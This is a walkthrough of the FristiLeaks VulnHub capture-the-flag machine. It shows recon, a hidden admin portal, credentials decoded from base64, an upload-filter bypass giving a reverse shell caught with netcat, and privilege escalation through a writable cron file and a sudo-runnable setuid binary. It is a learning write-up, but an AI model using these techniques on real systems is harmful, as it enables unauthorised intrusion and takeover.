FristiLeaks

This is my second box I have on my list to work through. As I mentioned earlier, these list is comprised of old boxes, but still can form a good challenge to work up to OSCP.
Recon
Starting with a nmap scan to find out which ports are open and what public facing services are running on the system.
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
| http-methods:
| Supported Methods: GET HEAD POST OPTIONS TRACE
|_ Potentially risky methods: TRACE
| http-robots.txt: 3 disallowed entries
|_/cola /sisi /beer
|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Port 80 with a webserver running behind it. The version of the webserver is Apache 2.2.15.
Nmap has guessed that the OS is CentOS.
There are some entries in the robots.txt
file, but before I investigate the website, I’m going to check the known vulnerabilities of the Apache version.
┌──[root@n0w4n]─[~/vulnhub/fristileaks]
└──╼ # searchsploit apache 2.2.15
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Apache 2.2.15 mod_proxy - Reverse Proxy Security Bypass | exploits/linux/remote/36663.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Webserver
The main page of the website has some names of the hackers behind Fristileaks and in the source there is a comment:
<!-- Welcome to #Fristleaks, a quick hackme VM by @Ar0xA
Goal: get UID 0 (root) and read the special flag file.
Timeframe: should be doable in 4 hours.
-->
The 3 entries in the robots.txt
file all point to the same picture, which looks like a red haring. Just to be sure I check the pic for meta data or other hidden data, but I can’t find anything.
Time to run dirSearch and bruteforce the website in hope of finding more files/folders.
Nothing……very frustrating. I tried different worklists, but all come back with the same results. Only the 3 drinks. I really cracked my head, it dawned on me that the 3 drinks were a hint and the main page was the answer. There was one drink that wasn’t in any of my lists, mostly because it is a particular Dutch drink……fristi
The result was a admin portal with some comments.
<meta name="description" content="super leet password login-test page. We use base64 encoding for images so they are inline in the HTML. I read somewhere on the web, that thats a good way to do it.">
<!--
TODO:
We need to clean this up for production. I left some junk in here to make testing easier.
- by eezeepz
-->
<!--
iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
U5ErkJggg==
-->
There are several ways to decode this base64 comment. As it is an encoded PNG file, I just replace the initial picture on the site with this piece of code. The result is a picture with a string of letters: keKkeKKeKKeKkEkkEk
A password? But what about the username? In the comment above there is name: eezeepz
This username combined with the password gives me access to a page with an upload posibility.
Will it let me upload anything?
Sorry, is not a valid file. Only allowed are: png,jpg,gif
Sorry, file not uploaded
So it won’t let me upload a php file. Will it let me upload a file with the extention php.jpg
?
Uploading, please wait
The file has been uploaded to /uploads
Yes, it will. Now to start up a listener and run the file from the browser.
┌──[root@n0w4n]─[~/vulnhub/fristileaks]
└──╼ # nc -lvnp 9999
listening on [any] 9999 ...
The file can be found in /fristi/uploads/shell.php.jpg
┌──[root@n0w4n]─[~/vulnhub/fristileaks]
└──╼ # nc -lvnp 9999
listening on [any] 9999 ...
connect to [192.168.50.130] from (UNKNOWN) [192.168.50.134] 47595
Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64 #1 SMP Tue Nov 10 18:01:38 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
17:17:45 up 1:05, 0 users, load average: 0.00, 0.01, 0.20
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-4.1$
A good place to start is the www folder and look for things I’ve missed.
sh-4.1$ cd /var/www
cd /var/www
sh-4.1$ ls -lah
ls -lah
total 28K
drwxr-xr-x. 6 root root 4.0K Nov 17 2015 .
drwxr-xr-x. 19 root root 4.0K Nov 19 2015 ..
drwxr-xr-x. 2 root root 4.0K Aug 24 2015 cgi-bin
drwxr-xr-x. 3 root root 4.0K Nov 17 2015 error
drwxr-xr-x. 7 root root 4.0K Nov 25 2015 html
drwxr-xr-x. 3 root root 4.0K Nov 17 2015 icons
-rw-r--r-- 1 root root 98 Nov 17 2015 notes.txt
A file called notes.txt
sh-4.1$ cat notes.txt
cat notes.txt
hey eezeepz your homedir is a mess, go clean it up, just dont delete
the important stuff.
-jerry
In the home directory of user eezeepz
is a note:
sh-4.1$ cat /home/eezeepz/notes.txt
cat /home/eezeepz/notes.txt
Yo EZ,
I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/
Don't forget to specify the full path for each binary!
Just put a file called "runthis" in /tmp/, each line one command. The
output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.
- Jerry
Ok, so I can try and use chmod to let me read more home folders. An important note is the piece of info in the note, that it is required to use the full path. So in this case I try /usr/bin/chmod
sh-4.1$ echo "/usr/bin/chmod -R 777 /home/" > runthis
echo "/home/admin/chmod -R 777 /home/" > runthis
After a minute I check /home
and it seems like it worked.
sh-4.1$ ls -lah /home
ls -lah /home
total 28K
drwxr-xr-x. 5 root root 4.0K Nov 19 2015 .
dr-xr-xr-x. 22 root root 4.0K May 27 16:11 ..
drwxrwxrwx. 2 admin admin 4.0K Nov 19 2015 admin
drwx---r-x. 5 eezeepz eezeepz 12K Nov 18 2015 eezeepz
drwx------ 2 fristigod fristigod 4.0K Nov 19 2015 fristigod
sh-4.1$ ls -lah
ls -lah
total 652K
drwxrwxrwx. 2 admin admin 4.0K Nov 19 2015 .
drwxr-xr-x. 5 root root 4.0K Nov 19 2015 ..
-rwxrwxrwx. 1 admin admin 18 Sep 22 2015 .bash_logout
-rwxrwxrwx. 1 admin admin 176 Sep 22 2015 .bash_profile
-rwxrwxrwx. 1 admin admin 124 Sep 22 2015 .bashrc
-rwxrwxrwx 1 admin admin 45K Nov 18 2015 cat
-rwxrwxrwx 1 admin admin 48K Nov 18 2015 chmod
-rwxrwxrwx 1 admin admin 737 Nov 18 2015 cronjob.py
-rwxrwxrwx 1 admin admin 21 Nov 18 2015 cryptedpass.txt
-rwxrwxrwx 1 admin admin 258 Nov 18 2015 cryptpass.py
-rwxrwxrwx 1 admin admin 89K Nov 18 2015 df
-rwxrwxrwx 1 admin admin 24K Nov 18 2015 echo
-rwxrwxrwx 1 admin admin 160K Nov 18 2015 egrep
-rwxrwxrwx 1 admin admin 160K Nov 18 2015 grep
-rwxrwxrwx 1 admin admin 84K Nov 18 2015 ps
-rw-r--r-- 1 fristigod fristigod 25 Nov 19 2015 whoisyourgodnow.txt
A few python scripts and textfiles. Let’s look at the text file from fristigod.
sh-4.1$ cat whoisyourgodnow.txt
cat whoisyourgodnow.txt
=RFn0AKnlMHMPIzpyuTI0ITG
Hmmm. What about the other text file.
sh-4.1$ cat cryptedpass.txt
cat cryptedpass.txt
mVGZ3O3omkJLmy2pcuTq
It isn’t base64. So let’s take a look at the python scripts.
#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys
def encodeString(str):
base64string= base64.b64encode(str)
return codecs.encode(base64string[::-1], 'rot13')
cryptoResult=encodeString(sys.argv[1])
print cryptoResult
It starts with a strings, encode base64, reverses the string and finally rot13 encoding.
To make it readible again, I need to reverse this script. For this I can use a bash oneliner.
┌──[root@n0w4n]─[~/vulnhub/fristileaks]
└──╼ # echo mVGZ3O3omkJLmy2pcuTq | tr 'A-Za-z' 'N-ZA-Mn-za-m' | rev | base64 -d
thisisalsopw123
┌──[root@n0w4n]─[~/vulnhub/fristileaks]
└──╼ # echo =RFn0AKnlMHMPIzpyuTI0ITG | tr 'A-Za-z' 'N-ZA-Mn-za-m' | rev | base64 -d
LetThereBeFristi!
Ok. Let’s see if this is a password.
sh-4.1$ python -c 'import pty;pty.spawn("/bin/sh");'
python -c 'import pty;pty.spawn("/bin/sh");'
sh-4.1$ su fristigod
su fristigod
Password: LetThereBeFristi!
bash-4.1$ id
id
uid=502(fristigod) gid=502(fristigod) groups=502(fristigod)
bash-4.1$ cd /home
cd /home
bash-4.1$ ls
ls
admin eezeepz fristigod
bash-4.1$ cd fristigod
cd fristigod
bash-4.1$ ls -lah
ls -lah
total 20K
drwx------ 2 fristigod fristigod 4.0K Nov 19 2015 .
drwxr-xr-x. 5 root root 4.0K Nov 19 2015 ..
-rw-r--r-- 1 fristigod fristigod 18 Sep 22 2015 .bash_logout
-rw-r--r-- 1 fristigod fristigod 176 Sep 22 2015 .bash_profile
-rw-r--r-- 1 fristigod fristigod 124 Sep 22 2015 .bashrc
Nothing….but as we could see in /etc/passwd
the home folder was located in /var/fristigod
.
bash-4.1$ cd /var/fristigod
cd /var/fristigod
bash-4.1$ ls -lah
ls -lah
total 16K
drwxr-x--- 3 fristigod fristigod 4.0K Nov 25 2015 .
drwxr-xr-x. 19 root root 4.0K Nov 19 2015 ..
-rw------- 1 fristigod fristigod 864 Nov 25 2015 .bash_history
drwxrwxr-x. 2 fristigod fristigod 4.0K Nov 25 2015 .secret_admin_stuff
bash-4.1$ cd .secret_admin_stuff
cd .secret_admin_stuff
bash-4.1$ ls -lah
ls -lah
total 16K
drwxrwxr-x. 2 fristigod fristigod 4.0K Nov 25 2015 .
drwxr-x--- 3 fristigod fristigod 4.0K Nov 25 2015 ..
-rwsr-sr-x 1 root root 7.4K Nov 25 2015 doCom
bash-4.1$ file doCom
file doCom
doCom: setuid setgid ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped
An ELF file with the SGID/SUID bit set.
bash-4.1$ ./doCom
./doCom
Nice try, but wrong user ;)
Hahaha….bummer.
bash-4.1$ sudo -l
sudo -l
[sudo] password for fristigod: LetThereBeFristi!
Matching Defaults entries for fristigod on this host:
requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User fristigod may run the following commands on this host:
(fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom
bash-4.1$ sudo -u fristi ./doCom
sudo -u fristi ./doCom
Usage: ./program_name terminal_command ...
So I can run the file as fristi.
bash-4.1$ sudo -u fristi ./doCom touch /var/fristigod/test.tmp
sudo -u fristi ./doCom touch /var/fristigod/test.tmp
bash-4.1$ ls -lah /var/fristigod
ls -lah /var/fristigod
total 16K
drwxr-x--- 3 fristigod fristigod 4.0K May 27 18:31 .
drwxr-xr-x. 19 root root 4.0K Nov 19 2015 ..
-rw------- 1 fristigod fristigod 864 Nov 25 2015 .bash_history
drwxrwxr-x. 2 fristigod fristigod 4.0K Nov 25 2015 .secret_admin_stuff
-rw-r--r-- 1 root users 0 May 27 18:31 test.tmp
Nice.
bash-4.1$ sudo -u fristi ./doCom chmod -R 777 /root
sudo -u fristi ./doCom chmod -R 777 /root
bash-4.1$ ls -lah /root
ls -lah /root
total 48K
drwxrwxrwx. 3 root root 4.0K Nov 25 2015 .
dr-xr-xr-x. 22 root root 4.0K May 27 16:11 ..
-rwxrwxrwx 1 root root 1.9K Nov 25 2015 .bash_history
-rwxrwxrwx. 1 root root 18 May 20 2009 .bash_logout
-rwxrwxrwx. 1 root root 176 May 20 2009 .bash_profile
-rwxrwxrwx. 1 root root 176 Sep 22 2004 .bashrc
drwxrwxrwx. 3 root root 4.0K Nov 25 2015 .c
-rwxrwxrwx. 1 root root 100 Sep 22 2004 .cshrc
-rwxrwxrwx. 1 root root 1.3K Nov 17 2015 .mysql_history
-rwxrwxrwx. 1 root root 129 Dec 3 2004 .tcshrc
-rwxrwxrwx. 1 root root 829 Nov 17 2015 .viminfo
-rwxrwxrwx. 1 root root 246 Nov 17 2015 fristileaks_secrets.txt
bash-4.1$ cat /root/fristileaks_secrets.txt
cat /root/fristileaks_secrets.txt
Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]
I wonder if you beat it in the maximum 4 hours it's supposed to take!
Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)
Flag: Y0u_kn0w_y0u_l0ve_fr1st1
And that was the challenge. Not to difficult and really a good one to try.